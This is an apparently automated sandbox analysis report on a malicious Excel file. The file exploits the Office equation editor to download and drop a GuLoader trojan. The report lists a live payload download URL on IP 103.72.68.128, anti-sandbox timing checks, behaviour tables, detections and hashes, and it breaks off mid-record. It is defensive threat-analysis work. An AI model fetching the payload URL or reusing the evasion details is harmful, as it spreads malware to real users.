    Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\AppData\Roaming\audiodgse.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\AppData\Roaming\audiodgse.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: #U4e5d#U6708#U58f0#U660e_40981677.xlsStream path 'MBD0010AD4D/CONTENTS' entropy: 7.98358241179 (max. 8.0)
    Source: #U4e5d#U6708#U58f0#U660e_40981677.xlsStream path 'MBD0010AD4E/CONTENTS' entropy: 7.91892112048 (max. 8.0)
    Source: #U4e5d#U6708#U58f0#U660e_40981677.xlsStream path 'MBD0010AD50/CONTENTS' entropy: 7.94631733096 (max. 8.0)
    Source: #U4e5d#U6708#U58f0#U660e_40981677.xlsStream path 'MBD0010AD54/CONTENTS' entropy: 7.94631733096 (max. 8.0)
    Source: 4B430000.0.drStream path 'MBD0010AD4D/CONTENTS' entropy: 7.98358241179 (max. 8.0)
    Source: 4B430000.0.drStream path 'MBD0010AD4E/CONTENTS' entropy: 7.91892112048 (max. 8.0)
    Source: 4B430000.0.drStream path 'MBD0010AD50/CONTENTS' entropy: 7.94631733096 (max. 8.0)
    Source: 4B430000.0.drStream path 'MBD0010AD54/CONTENTS' entropy: 7.94631733096 (max. 8.0)

    Malware Analysis System Evasion

    barindex
    Source: C:\Users\user\AppData\Roaming\audiodgse.exeRDTSC instruction interceptor: First address: 000000000894429E second address: 000000000894429E instructions: 0x00000000 rdtsc 0x00000002 test ch, ah 0x00000004 cmp ebx, ecx 0x00000006 jc 00007FC3E1C2AE84h 0x00000008 inc ebp 0x00000009 cmp edx, ebx 0x0000000b inc ebx 0x0000000c test al, cl 0x0000000e rdtsc
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2452Thread sleep time: -300000s >= -30000sJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2976Thread sleep time: -360000s >= -30000sJump to behavior
    Source: C:\Users\user\AppData\Roaming\audiodgse.exeCode function: 5_2_004062DD FindFirstFileA,FindClose,5_2_004062DD
    Source: C:\Users\user\AppData\Roaming\audiodgse.exeCode function: 5_2_004057A2 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,5_2_004057A2
    Source: C:\Users\user\AppData\Roaming\audiodgse.exeCode function: 5_2_00402765 FindFirstFileA,5_2_00402765
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEAPI call chain: ExitProcess graph end nodegraph_2-2323
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEAPI call chain: ExitProcess graph end nodegraph_2-2916
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEAPI call chain: ExitProcess graph end nodegraph_2-2645
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEAPI call chain: ExitProcess graph end nodegraph_2-2342
    Source: C:\Users\user\AppData\Roaming\audiodgse.exeAPI call chain: ExitProcess graph end nodegraph_5-4905
    Source: C:\Users\user\AppData\Roaming\audiodgse.exeAPI call chain: ExitProcess graph end nodegraph_5-4910
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEAPI call chain: ExitProcess graph end nodegraph_9-2702
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEAPI call chain: ExitProcess graph end nodegraph_9-2317
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEAPI call chain: ExitProcess graph end nodegraph_9-2616
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEAPI call chain: ExitProcess graph end nodegraph_9-2298
    Source: C:\Users\user\AppData\Roaming\audiodgse.exeCode function: 5_2_72BE1A98 GlobalAlloc,lstrcpyA,lstrcpyA,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyA,GetModuleHandleA,LoadLibraryA,GetProcAddress,lstrlenA,5_2_72BE1A98
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_0353048F mov edx, dword ptr fs:[00000030h]2_2_0353048F
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 9_2_035F048F mov edx, dword ptr fs:[00000030h]9_2_035F048F
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\audiodgse.exe "C:\Users\user\AppData\Roaming\audiodgse.exe" Jump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\audiodgse.exe "C:\Users\user\AppData\Roaming\audiodgse.exe" Jump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
    Source: C:\Users\user\AppData\Roaming\audiodgse.exeCode function: 5_2_00403235 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,5_2_00403235
    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
    Valid Accounts11
    Scripting
    1
    Registry Run Keys / Startup Folder
    1
    Access Token Manipulation
    1
    Masquerading
    OS Credential Dumping2
    Security Software Discovery
    Remote Services1
    Archive Collected Data
    Exfiltration Over Other Network Medium1
    Encrypted Channel
    Eavesdrop on Insecure Network CommunicationRemotely Track Device Without Authorization1
    System Shutdown/Reboot
    Default Accounts1
    Native API
    Boot or Logon Initialization Scripts11
    Process Injection
    1
    Disable or Modify Tools
    LSASS Memory1
    Virtualization/Sandbox Evasion
    Remote Desktop Protocol1
    Clipboard Data
    Exfiltration Over Bluetooth33
    Ingress Tool Transfer
    Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
    Domain Accounts22
    Exploitation for Client Execution
    Logon Script (Windows)1
    Registry Run Keys / Startup Folder
    1
    Virtualization/Sandbox Evasion
    Security Account Manager1
    Remote System Discovery
    SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration1
    Non-Application Layer Protocol
    Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
    Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)1
    Access Token Manipulation
    NTDS3
    File and Directory Discovery
    Distributed Component Object ModelInput CaptureScheduled Transfer21
    Application Layer Protocol
    SIM Card SwapCarrier Billing Fraud
    Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script11
    Process Injection
    LSA Secrets15
    System Information Discovery
    SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
    Replication Through Removable MediaLaunchdRc.commonRc.common11
    Scripting
    Cached Domain CredentialsSystem Owner/User DiscoveryVNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
    External Remote ServicesScheduled TaskStartup ItemsStartup Items11
    Obfuscated Files or Information
    DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet
    behaviorgraph top1 signatures2 2 Behavior Graph ID: 1326245 Sample: #U4e5d#U6708#U58f0#U660e_40... Startdate: 16/10/2023 Architecture: WINDOWS Score: 100 38 Multi AV Scanner detection for domain / URL 2->38 40 Antivirus detection for URL or domain 2->40 42 Antivirus detection for dropped file 2->42 44 10 other signatures 2->44 6 EQNEDT32.EXE 12 2->6         started        11 EQNEDT32.EXE 10 2->11         started        13 AcroRd32.exe 33 2->13         started        15 EXCEL.EXE 60 79 2->15         started        process3 dnsIp4 32 103.72.68.128, 49164, 80 FARIYA-PKFariyaNetworksPvtLtdPK India 6->32 28 C:\Users\user\AppData\Roaming\audiodgse.exe, PE32 6->28 dropped 30 C:\Users\user\AppData\Local\...\smss[1].exe, PE32 6->30 dropped 52 Office equation editor establishes network connection 6->52 54 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 6->54 17 audiodgse.exe 2 35 6->17         started        21 audiodgse.exe 24 11->21         started        23 RdrCEF.exe 2 13->23         started        file5 signatures6 process7 dnsIp8 26 C:\Users\user\AppData\Local\...\System.dll, PE32 17->26 dropped 46 Antivirus detection for dropped file 17->46 48 Multi AV Scanner detection for dropped file 17->48 50 Tries to detect virtualization through RDTSC time measurements 17->50 34 192.168.2.22, 137, 138, 49164 unknown unknown 23->34 36 192.168.2.255, 137, 138 unknown unknown 23->36 file9 signatures10

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


    windows-stand
    SourceDetectionScannerLabelLink
    #U4e5d#U6708#U58f0#U660e_40981677.xls34%ReversingLabsWin32.Exploit.CVE-2018-0802
    #U4e5d#U6708#U58f0#U660e_40981677.xls48%VirustotalBrowse
    #U4e5d#U6708#U58f0#U660e_40981677.xls100%AviraEXP/CVE-2018-0798.Gen
    SourceDetectionScannerLabelLink
    C:\Users\user\AppData\Roaming\audiodgse.exe100%AviraHEUR/AGEN.1331786
    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\smss[1].exe100%AviraHEUR/AGEN.1331786
    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\smss[1].exe32%ReversingLabsWin32.Trojan.Guloader
    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\smss[1].exe32%VirustotalBrowse
    C:\Users\user\AppData\Local\Temp\nsfF9C.tmp\System.dll0%ReversingLabs
    C:\Users\user\AppData\Local\Temp\nsfF9C.tmp\System.dll0%VirustotalBrowse
    C:\Users\user\AppData\Roaming\audiodgse.exe32%ReversingLabsWin32.Trojan.Guloader
    C:\Users\user\AppData\Roaming\audiodgse.exe32%VirustotalBrowse
    No Antivirus matches
    No Antivirus matches
    SourceDetectionScannerLabelLink
    http://103.72.68.128/S1510M/smss.exeeanO0%Avira URL Cloudsafe
    http://103.72.68.128/S1510M/smss.exeiiC:0%Avira URL Cloudsafe
    http://103.72.68.128/S1510M/smss.exej100%Avira URL Cloudmalware
    http://103.72.68.128/S1510M/smss.exe100%Avira URL Cloudmalware
    http://103.72.68.128/S1510M/smss.exej11%VirustotalBrowse
    http://103.72.68.128/S1510M/smss.exe11%VirustotalBrowse
    No contacted domains info
    NameMaliciousAntivirus DetectionReputation
    http://103.72.68.128/S1510M/smss.exetrue
    • 11%, Virustotal, Browse
    • Avira URL Cloud: malware
    unknown
    NameSourceMaliciousAntivirus DetectionReputation
    http://103.72.68.128/S1510M/smss.exeiiC:EQNEDT32.EXE, 00000002.00000002.413445105.000000000065F000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000009.00000002.477317406.000000000063F000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    http://nsis.sf.net/NSIS_Erroraudiodgse.exe, audiodgse.exe, 00000005.00000000.413248475.0000000000409000.00000008.00000001.01000000.00000005.sdmp, audiodgse.exe, 00000005.00000002.1051225983.0000000000409000.00000004.00000001.01000000.00000005.sdmp, audiodgse.exe, 0000000A.00000000.476233399.0000000000409000.00000008.00000001.01000000.00000005.sdmp, audiodgse.exe.2.dr, smss[1].exe.2.drfalse
      high
      http://nsis.sf.net/NSIS_ErrorErroraudiodgse.exe, 00000005.00000000.413248475.0000000000409000.00000008.00000001.01000000.00000005.sdmp, audiodgse.exe, 00000005.00000002.1051225983.0000000000409000.00000004.00000001.01000000.00000005.sdmp, audiodgse.exe, 0000000A.00000000.476233399.0000000000409000.00000008.00000001.01000000.00000005.sdmp, audiodgse.exe.2.dr, smss[1].exe.2.drfalse
        high
        http://103.72.68.128/S1510M/smss.exeeanOEQNEDT32.EXE, 00000009.00000002.477317406.000000000063F000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        unknown
        http://103.72.68.128/S1510M/smss.exejEQNEDT32.EXE, 00000002.00000002.413534624.0000000003530000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000009.00000002.477890729.00000000035F0000.00000004.00000020.00020000.00000000.sdmpfalse
        • 11%, Virustotal, Browse
        • Avira URL Cloud: malware
        unknown
        • No. of IPs < 25%
        • 25% < No. of IPs < 50%
        • 50% < No. of IPs < 75%
        • 75% < No. of IPs
        IPDomainCountryFlagASNASN NameMalicious
        103.72.68.128
        unknownIndia
        45814FARIYA-PKFariyaNetworksPvtLtdPKtrue
        IP
        192.168.2.22
        192.168.2.255
        Joe Sandbox Version:38.0.0 Ammolite
        Analysis ID:1326245
        Start date and time:2023-10-16 09:57:05 +02:00
        Joe Sandbox Product:CloudBasic
        Overall analysis duration:0h 10m 9s
        Hypervisor based Inspection enabled:false
        Report type:full
        Cookbook file name:defaultwindowsofficecookbook.jbs
        Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
        Number of analysed new started processes analysed:16
        Number of new started drivers analysed:0
        Number of existing processes analysed:0
        Number of existing drivers analysed:0
        Number of injected processes analysed:0
        Technologies:
        • HCA enabled
        • EGA enabled
        • GSI enabled (VBA)
        • AMSI enabled
        Analysis Mode:default
        Analysis stop reason:Timeout
        Sample file name:#U4e5d#U6708#U58f0#U660e_40981677.xls
        renamed because original name is a hash value
        Original Sample Name:_40981677.xls
        Detection:MAL
        Classification:mal100.troj.expl.evad.winXLS@22/46@0/3
        EGA Information:
        • Successful, ratio: 100%
        HCA Information:
        • Successful, ratio: 100%
        • Number of executed functions: 73
        • Number of non-executed functions: 30
        Cookbook Comments:
        • Found application associated with file extension: .xls
        • Found Word or Excel or PowerPoint or XPS Viewer
        • Attach to Office via COM
        • Active ActiveX Object
        • Active ActiveX Object
        • Active ActiveX Object
        • Active ActiveX Object
        • Active ActiveX Object
        • Active ActiveX Object
        • Active ActiveX Object
        • Active ActiveX Object
        • Active ActiveX Object
        • Active ActiveX Object
        • Active ActiveX Object
        • Scroll down
        • Close Viewer
        • Override analysis time to 56385.5349400749 for current running targets taking high CPU consumption
        • Override analysis time to 112771.06988015 for current running targets taking high CPU consumption
        • Override analysis time to 225542.1397603 for current running targets taking high CPU consumption
        • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, svchost.exe
        • Excluded IPs from analysis (whitelisted): 209.197.3.8, 23.200.60.110, 23.72.90.6, 23.72.90.12
        • Excluded domains from analysis (whitelisted): ssl.adobe.com.edgekey.net, armmf.adobe.com, e4578.dscb.akamaiedge.net, acroipm2.adobe.com.edgesuite.net, a122.dscd.akamai.net, ctldl.windowsupdate.com, cds.d2s7q6s2.hwcdn.net, wu-bg-shim.trafficmanager.net, acroipm2.adobe.com
        • Report size exceeded maximum capacity and may have missing behavior information.
        • Report size getting too big, too many NtAllocateVirtualMemory calls found.
        • Report size getting too big, too many NtCreateFile calls found.
        • Report size getting too big, too many NtOpenKeyEx calls found.
        • Report size getting too big, too many NtQueryAttributesFile calls found.
        • Report size getting too big, too many NtQueryValueKey calls found.
        TimeTypeDescription
        09:58:21API Interceptor173x Sleep call for process: EQNEDT32.EXE modified
        09:58:29API Interceptor233x Sleep call for process: AcroRd32.exe modified
        09:58:40API Interceptor61x Sleep call for process: RdrCEF.exe modified
        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
        103.72.68.128MaMsKRmgXZ.exeGet hashmaliciousFormBook, GuLoaderBrowse
        • 103.72.68.128/pcd/wAYOlXAIjrMljL79.bin
        Part_number_91875-11400_x_6.xlsGet hashmaliciousGuLoaderBrowse
        • 103.72.68.128/M0910T/smss.exe
        SOA_OCT.xlsGet hashmaliciousUnknownBrowse
        • 103.72.68.128/S0810M/smss.exe
        SOA_OCT.exeGet hashmaliciousFormBook, GuLoaderBrowse
        • 103.72.68.128/pcd/ygcrnsVvq3.bin
        No context
        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
        FARIYA-PKFariyaNetworksPvtLtdPKMaMsKRmgXZ.exeGet hashmaliciousFormBook, GuLoaderBrowse
        • 103.72.68.128
        Part_number_91875-11400_x_6.xlsGet hashmaliciousGuLoaderBrowse
        • 103.72.68.128
        SOA_OCT.xlsGet hashmaliciousUnknownBrowse
        • 103.72.68.128
        SOA_OCT.exeGet hashmaliciousFormBook, GuLoaderBrowse
        • 103.72.68.128
        3zCwW2eF3f.elfGet hashmaliciousMiraiBrowse
        • 111.92.200.115
        noxdC49Cci.elfGet hashmaliciousUnknownBrowse
        • 103.74.23.209
        https://www.weichert.com/links.aspx?https://na2.eecsign.com/y45ar9vKusa8D1mChory45ana0Try45ha8Dnhsa8DukGet hashmaliciousHTMLPhisherBrowse
        • 103.76.128.106
        NuQd72CIeK.elfGet hashmaliciousMiraiBrowse
        • 39.62.16.215
        Anfrage_INQ0981_xlsx.exeGet hashmaliciousGuLoaderBrowse
        • 103.76.128.7
        pTkFzJdEvE.elfGet hashmaliciousUnknownBrowse
        • 39.62.200.128
        arctically_revyers.exeGet hashmaliciousGuLoaderBrowse
        • 103.76.128.7
        wYGJSu5FPn.elfGet hashmaliciousMirai, MoobotBrowse
        • 103.72.65.240
        z3hir.arm.elfGet hashmaliciousMiraiBrowse
        • 59.103.94.130
        https://eu45.web.app/sdy9s3Rhri2Psk17Fe5nsFe5nx0qhandFe5lsblak17k17grWO3updy9s3RWO3BM2Get hashmaliciousUnknownBrowse
        • 103.76.128.106
        https://dse.mihanair.com/?organisation=handelsblattgroup.com?&ref=cy5jaHJpc3RlbnNlbkBoYW5kZWxzYmxhdHRncm91cC5jb20=#/auth/authorize?client_id=0.30038618496637-0ff1-0.12773079105082&auth=10.28450389499054-0.68949893521587Get hashmaliciousUnknownBrowse
        • 103.76.128.106
        aXpsGG2XaP.elfGet hashmaliciousMiraiBrowse
        • 39.62.16.253
        U7LTMj2PAO.elfGet hashmaliciousMiraiBrowse
        • 111.92.200.196
        usjvpec40i.elfGet hashmaliciousMiraiBrowse
        • 39.62.211.164
        CT1zp877iP.elfGet hashmaliciousMiraiBrowse
        • 111.92.195.219
        7h922H0hee.elfGet hashmaliciousMiraiBrowse
        • 59.103.94.109
        No context
        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
        C:\Users\user\AppData\Local\Temp\nsfF9C.tmp\System.dllMaMsKRmgXZ.exeGet hashmaliciousFormBook, GuLoaderBrowse
          MaMsKRmgXZ.exeGet hashmaliciousGuLoaderBrowse
            Part_number_91875-11400_x_6.xlsGet hashmaliciousGuLoaderBrowse
              3CoQ2gnbIu.exeGet hashmaliciousGuLoaderBrowse
                3CoQ2gnbIu.exeGet hashmaliciousGuLoaderBrowse
                  Zc8N38ZHPi.exeGet hashmaliciousGuLoaderBrowse
                    Zc8N38ZHPi.exeGet hashmaliciousGuLoaderBrowse
                      SOA_OCT.exeGet hashmaliciousFormBook, GuLoaderBrowse
                        SOA_OCT.exeGet hashmaliciousGuLoaderBrowse
                          Cargo_manifest_&_BL_10784813.exeGet hashmaliciousGuLoaderBrowse
                            Cargo_manifest_&_BL_10784813.exeGet hashmaliciousGuLoaderBrowse
                              Payment_Advice-pdf.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                Payment_Advice-pdf.exeGet hashmaliciousGuLoaderBrowse
                                  Civilizee.exeGet hashmaliciousGuLoaderBrowse
                                    Civilizee.exeGet hashmaliciousGuLoaderBrowse
                                      RFQ6789034SEPT23_prodotto_Prodital_Italia_Srl.exeGet hashmaliciousGuLoader, RemcosBrowse
                                        RFQ6789034SEPT23_prodotto_Prodital_Italia_Srl.exeGet hashmaliciousGuLoaderBrowse
                                          RFQ____RM_quotation_JPEG_IMAGE.exeGet hashmaliciousGuLoader, RemcosBrowse
                                            RFQ____RM_quotation_JPEG_IMAGE.exeGet hashmaliciousGuLoaderBrowse
                                              I-ID-4175285786-D07450364_20230803042004.exeGet hashmaliciousGuLoaderBrowse
                                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Mon Oct 16 08:58:53 2023, Security: 0
                                                Category:dropped
                                                Size (bytes):1424384
                                                Entropy (8bit):7.841255073938591
                                                Encrypted:false
                                                SSDEEP:24576:+WQmmav30x3Zyvw6Vr9bV1DWZylw6VK4bV1P9qfa4HBA8b7DJHj/xOroKK3t2fon:zQmmQ30jr6Vr9bVWh6VK4bVKRA8bXJLT
                                                MD5:5E6148DC18712F3B090652691D016616
                                                SHA1:D5488DED267AD18F555AA81F5745E4C708A66BB6
                                                SHA-256:9F490B1971564541CF4A4E0FEDAD05798BF719B5449B7CF2A59A97CF5F6CB343
                                                SHA-512:24BD24571A2F510E25475A848AE3D1438E71685A18B19E865C99F2A6AAA62B671EB28C1DF1E567C53D5CDF1AF5A312CF2BE4191122596A3892EA1CF75D6CA536
                                                Malicious:false
                                                Reputation:low
                                                Preview:......................>.......................................................0...1...H...I...?.......................$.......b.......d.......f.......h.......j.............................................................................................................................................................................................................................................................................................................................................................................../.......G................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-...........F...........3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...
                                                Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                File Type:data
                                                Category:modified
                                                Size (bytes):270336
                                                Entropy (8bit):0.0018885380473555064
                                                Encrypted:false
                                                SSDEEP:3:MsEllllkEthXllkl2zExlSvl:/M/xT02z5
                                                MD5:5166931C33EFA8F459A8E5CEDCBEA879
                                                SHA1:27D2834EEDD1D20004299C6721B996B696F35A9B
                                                SHA-256:DABDAE21A6389F5593EAB5F6538D772CA278166E0CB5C2AE46DBFDA4FC4C9B2B
                                                SHA-512:7A4158A770F81F4578022342F8856F396E8B50BBE2B7031C787CF5FBBF648EA2191A8328959CCACD74C978066049364D78B031A0557358D12B5325CB09260740
                                                Malicious:false
                                                Reputation:low
                                                Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                File Type:ASCII text
                                                Category:dropped
                                                Size (bytes):292
                                                Entropy (8bit):5.262185727083471
                                                Encrypted:false
                                                SSDEEP:6:ko8cq2PP2nKuAl9OmbnIFUtBsrZmwvshkwOP2nKuAl9OmbjLJ:ko8cvWHAahFUt6r/Uh57HAaSJ
                                                MD5:0E0C82F2B1EC65CF15E9D841918CF77E
                                                SHA1:954405231AFF31B5FC77DD38C5685A8BEBDF9DA0
                                                SHA-256:2A192E765FF1F216EEF91ADD40D0755BAFCBFDD917BBCCBE80CB786BC85B67A0
                                                SHA-512:02B8F14C1F6FFA3D573ACD824FC4009B97FB6345122EADDA88D04969D908181BD207F9BF703B217068C53F324310726F50F3E63395ED52BFD724A2ADA5617FEA
                                                Malicious:false
                                                Reputation:low
                                                Preview:2023/10/16-09:58:42.507 3824 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2023/10/16-09:58:42.509 3824 Recovering log #3.2023/10/16-09:58:42.509 3824 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .
                                                Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):131072
                                                Entropy (8bit):0.008898238653846898
                                                Encrypted:false
                                                SSDEEP:3:ImtVnM1xVlt/rt/l3Sxdlt4dV1gt/lop:IiV0xlzaxdX4m1lo
                                                MD5:3B8BF2F369CA7ABDF0636EE15DDEF161
                                                SHA1:4B82D483B79B555C62AA17F31F24F43C38F2C80F
                                                SHA-256:100201408FDCFA835C8699C6C2FCE748C5C3844C386053F9AA7CAD622373BFCA
                                                SHA-512:457D92EA15FA528E7BE3ED8136A267BD08A4D7866FDD7C353CFEB898F896983B40BB48156DC25D5E00EC118C6309337F3A9344226D1635F94D7F4A122D3DD87E
                                                Malicious:false
                                                Reputation:moderate, very likely benign file
                                                Preview:VLnk.....?......LhXJ ...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
